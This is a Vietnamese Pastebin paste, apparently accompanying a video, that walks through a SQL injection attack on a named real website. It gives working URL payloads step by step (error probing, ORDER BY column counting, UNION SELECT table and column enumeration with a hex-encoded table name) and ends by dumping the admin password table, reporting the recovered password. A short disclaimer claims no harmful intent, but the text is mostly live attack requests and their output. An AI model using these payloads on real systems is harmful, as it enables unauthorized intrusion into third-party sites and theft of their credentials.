Advertisement
JKD_Jacker

[ SQL ] Sổ tay SQL by JKD-1142

Feb 27th, 2016
15,866
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.29 KB | None | 0 0
  1. - JKD xin hướng dẫn các bạn khai thác lỗ hỗng SQL cơ bản
  2.  
  3. Victim : http://www.futurenepal.org/newsdetails.php?activityid=11
  4.  
  5. - Bước 1 : Tìm lỗi
  6. + Mã : http://www.futurenepal.org/newsdetails.php?activityid=11'
  7.  
  8. Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/futurene/public_html/newsdetails.php on line 11 ! Lỗi nhé !!!
  9.  
  10. - Bước 2 : Tìm số trường cột
  11. + Mã : order by 1-- -
  12.  
  13. Cột 1 : ko lỗi
  14. Cột 3 : ko lỗi >> chúng ta chọn cột thứ 3 nhé !!!
  15. Cột 4 : lỗi
  16. Cột 10 : lỗi
  17.  
  18. - Bước 3 : Xác định vị trí trường cột bị lỗi (Chúng ta dùng union select nhé !!) khi chúng ta ko thấy cái số cột lỗi thì ta thêm - trước số 11
  19. + Mã : http://www.futurenepal.org/newsdetails.php?activityid=-11 UNION SELECT 1,2,3-- -
  20. 2 vs 3
  21.  
  22. - Bước 4 : Tìm tables
  23. + Mã : http://www.futurenepal.org/newsdetails.php?activityid=-11 UNION SELECT 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- -
  24.  
  25.  
  26. tbactivity,tbadminpwd,tbcontents,tbhitcounter,tbmails,tbphotos,tbsetting,tbslidephotos
  27. ở table này chứa user + pass là tbadminpwd nhé !!! JKD sai chỗ nào nhỉ =))
  28.  
  29. - Bước 5 : Xuất column trong table chứa user + pass
  30. + Mã : http://www.futurenepal.org/newsdetails.php?activityid=-11 UNION SELECT 1,group_concat(column_name),3 from information_schema.columns where table_name=0x746261646d696e707764-- -
  31.  
  32. Site này theo kinh nghiệm JKD thì đã bị phá rồi !! nên chỉ còn Password or ... !!! và video này chủ yếu là dạy các bạn cơ bản hoy !! ko có ý đồ phá hoại ... nên JKD sẽ tiếp tục nhé !!
  33.  
  34.  
  35.  
  36. - Bước 6 : Xuất user + pass
  37. + Mã : http://www.futurenepal.org/newsdetails.php?activityid=-11 UNION SELECT 1,group_concat(Password),3 from tbadminpwd-- -
  38.  
  39. và pass là : admin
  40.  
  41.  
  42.  
  43. - Lưu ý : video này chủ yếu dạy các bạn khai thác hoy ! ko có ý phá hoại !! và ở video có nhiều chỗ sơ xài !! có gì ko hĩu các bạn có thể ib page hỏi !!!
  44.  
  45. - và Dụng cụ quan trọng là : hackbar nhé !! để encoding nhé !!!
  46.  
  47. Blog : jkd-jacker.blogspot.com
  48. Page : fb.com/jkd.hack/ !!!
  49.  
  50. Thank You For watching !!! Hello And Say Goodbye <3
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement